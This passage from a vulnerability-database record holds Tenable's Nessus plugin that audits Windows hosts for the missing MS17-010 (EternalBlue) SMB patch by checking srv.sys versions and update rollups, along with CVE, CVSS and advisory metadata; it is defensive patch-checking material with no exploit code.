Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", 
min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows 
Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-06T03:05:04", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "b9abd8135dbfca43008678d0346e679b", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?065561d0", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-12T14:05:28", "history": [], "viewCount": 2979, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T14:05:28", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-12T14:05:28", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", 
min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, 